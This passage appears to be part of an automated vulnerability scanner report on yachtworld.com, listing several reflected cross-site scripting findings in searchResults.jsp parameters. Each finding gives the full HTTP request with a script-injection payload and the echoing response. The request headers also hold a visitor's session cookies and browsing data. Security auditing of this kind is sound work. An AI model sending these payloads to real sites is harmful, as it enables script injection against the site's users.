Content-Length: 94887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
39.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.yachtworld.com/en/opensearchresults.html';
OAS_listpos = 'Top1,Right1';
OAS_query = '&man=regulator&type=used&minyr=2004&minpr=0&minl=24&maxl=327ec31';alert(1)//94360dd5dbfae9f10';
OAS_target = '_top';
OAS_version = 10;
OAS_rn = '001234567890';
OAS_rns = '1234567890';
OAS_rn = new String(Math.random()); OAS_rns = OAS_rn.substring(2, 11);

function OAS_NORMAL(pos)
{
document.
...[SNIP]...

3.396. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [toLength parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the toLength request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8ca5'%3balert(1)//1a6789b9647 was submitted in the toLength parameter. This input was echoed as d8ca5';alert(1)//1a6789b9647 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&currencyid=100&cit=true&toLength=32d8ca5'%3balert(1)//1a6789b9647&luom=126&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range&No=10 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_; VIEWED_BOATS_STORE=2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.12.10.1296155952; s_pers=%20s_nr%3D1296156045407%7C1298748045407%3B%20s_lv%3D1296156045410%7C1390764045410%3B%20s_lv_s%3DFirst%2520Visit%7C1296157845410%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/cache/searchResults.jsp%2525253FNtk%2525253DboatsEN%25252526searchtype%2525253Dhomepage%25252526fromY%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:51 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 93745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
39.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.yachtworld.com/en/opensearchresults.html';
OAS_listpos = 'Top1,Right1';
OAS_query = '&man=regulator&type=used&minyr=2004&minpr=0&minl=24&maxl=32d8ca5';alert(1)//1a6789b9647';
OAS_target = '_top';
OAS_version = 10;
OAS_rn = '001234567890';
OAS_rns = '1234567890';
OAS_rn = new String(Math.random()); OAS_rns = OAS_rn.substring(2, 11);

function OAS_NORMAL(pos)
{
document.
...[SNIP]...

3.397. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [toYear parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the toYear request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82d4e'%3balert(1)//eb25b90bb3ba75971 was submitted in the toYear parameter. This input was echoed as 82d4e';alert(1)//eb25b90bb3ba75971 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?man=regulator&is=false&type=&luom=126&fromLength=24&toLength=32&fromYear=2004&toYear=82d4e'%3balert(1)//eb25b90bb3ba75971&pricderange=Select+Price+Range&Ntt=&fromPrice=0&toPrice=&searchtype=homepage&cit=true&slim=quick&ybw=&sm=3&Ntk=boatsEN&currencyid=100 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/
Cache-Control: max-age=0
Origin: http://www.yachtworld.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; s_pers=%20s_nr%3D1296155951861%7C1298747951861%3B%20s_lv%3D1296155951863%7C1390763951863%3B%20s_lv_s%3DFirst%2520Visit%7C1296157751863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.2.10.1296155952; savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:40:19 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 94151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
= 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.yachtworld.com/en/opensearchresults.html';
OAS_listpos = 'Top1,Right1';
OAS_query = '&man=regulator&type=used&minyr=2004&maxyr=82d4e';alert(1)//eb25b90bb3ba75971&minpr=0&minl=24&maxl=32';
OAS_target = '_top';
OAS_version = 10;
OAS_rn = '001234567890';
OAS_rns = '1234567890';
OAS_rn = new String(Math.random()); OAS_rns = OAS_rn.substring(2, 11);

function OAS_
...[SNIP]...

3.398. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [toYear parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the toYear request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5af4e'%3balert(1)//9065e4618ba was submitted in the toYear parameter. This input was echoed as 5af4e';alert(1)//9065e4618ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?cit=true&slim=quick&ybw=&sm=3&searchtype=homepage&Ntk=boatsEN&Ntt=&is=false&man=regulator&hmid=0&ftid=0&enid=0&fromLength=24&toLength=32&luom=126&fromYear=2004&toYear=5af4e'%3balert(1)//9065e4618ba&fromPrice=0&toPrice=&currencyid=100&city=&rid=&cint=100&pbsint=&boatsAddedSelected=-1 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/advancedSearch.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&luom=126&currencyid=100&cit=true&toLength=32&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.22.10.1296155952; s_pers=%20s_nr%3D1296156246717%7C1298748246717%3B%20s_lv%3D1296156246727%7C1390764246727%3B%20s_lv_s%3DFirst%2520Visit%7C1296158046727%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DadvancedSearch_US%252526pidt%25253D1%252526oid%25253DSearch%252526oidt%25253D3%252526ot%25253DSUBMIT%3B; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:41:19 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 95041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
= 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.yachtworld.com/en/opensearchresults.html';
OAS_listpos = 'Top1,Right1';
OAS_query = '&man=regulator&type=used&minyr=2004&maxyr=5af4e';alert(1)//9065e4618ba&minpr=0&minl=24&maxl=32';
OAS_target = '_top';
OAS_version = 10;
OAS_rn = '001234567890';
OAS_rns = '1234567890';
OAS_rn = new String(Math.random()); OAS_rns = OAS_rn.substring(2, 11);

function OAS_
...[SNIP]...

3.399. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the type request parameter is copied into the HTML document as text between TITLE tags. The payload 9a157</title><script>alert(1)</script>6f256bef360873b0f was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /core/listing/cache/searchResults.jsp?man=regulator&is=false&type=9a157</title><script>alert(1)</script>6f256bef360873b0f&luom=126&fromLength=24&toLength=32&fromYear=2004&toYear=&pricderange=Select+Price+Range&Ntt=&fromPrice=0&toPrice=&searchtype=homepage&cit=true&slim=quick&ybw=&sm=3&Ntk=boatsEN&currencyid=100 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/
Cache-Control: max-age=0
Origin: http://www.yachtworld.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; s_pers=%20s_nr%3D1296155951861%7C1298747951861%3B%20s_lv%3D1296155951863%7C1390763951863%3B%20s_lv_s%3DFirst%2520Visit%7C1296157751863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.2.10.1296155952; savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:49 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 35529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>2004 regulator 9a157</title><script>alert(1)</script>6f256bef360873b0f Boats For Sale</title>
...[SNIP]...

3.400. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9505"%3balert(1)//2df1792999f5e77d was submitted in the type parameter. This input was echoed as a9505";alert(1)//2df1792999f5e77d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /core/listing/cache/searchResults.jsp?man=regulator&is=false&type=a9505"%3balert(1)//2df1792999f5e77d&luom=126&fromLength=24&toLength=32&fromYear=2004&toYear=&pricderange=Select+Price+Range&Ntt=&fromPrice=0&toPrice=&searchtype=homepage&cit=true&slim=quick&ybw=&sm=3&Ntk=boatsEN&currencyid=100 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/
Cache-Control: max-age=0
Origin: http://www.yachtworld.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; s_pers=%20s_nr%3D1296155951861%7C1298747951861%3B%20s_lv%3D1296155951863%7C1390763951863%3B%20s_lv_s%3DFirst%2520Visit%7C1296157751863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.2.10.1296155952; savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:44 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 35420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<titl
...[SNIP]...
<!--
s.prop4="no search phrase entered"
s.prop5="regulator"
s.prop6="Used"
s.prop7="a9505";alert(1)//2df1792999f5e77d"
s.prop8="24'-32'"
s.prop9=">
...[SNIP]...

3.401. http://www.yachtworld.com/core/listing/cache/searchResults.jsp [type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/searchResults.jsp

Issue detail

The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da9fa"><script>alert(1)</script>dc4f88da9f6701ea3 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /core/listing/cache/searchResults.jsp?man=regulator&is=false&type=da9fa"><script>alert(1)</script>dc4f88da9f6701ea3&luom=126&fromLength=24&toLength=32&fromYear=2004&toYear=&pricderange=Select+Price+Range&Ntt=&fromPrice=0&toPrice=&searchtype=homepage&cit=true&slim=quick&ybw=&sm=3&Ntk=boatsEN&currencyid=100 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/
Cache-Control: max-age=0
Origin: http://www.yachtworld.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; s_pers=%20s_nr%3D1296155951861%7C1298747951861%3B%20s_lv%3D1296155951863%7C1390763951863%3B%20s_lv_s%3DFirst%2520Visit%7C1296157751863%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.2.10.1296155952; savedLabel0=24-32%20ft%2Cregulator%2CUsed%2C2004; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; latestSavedSearches=0_

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:43 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
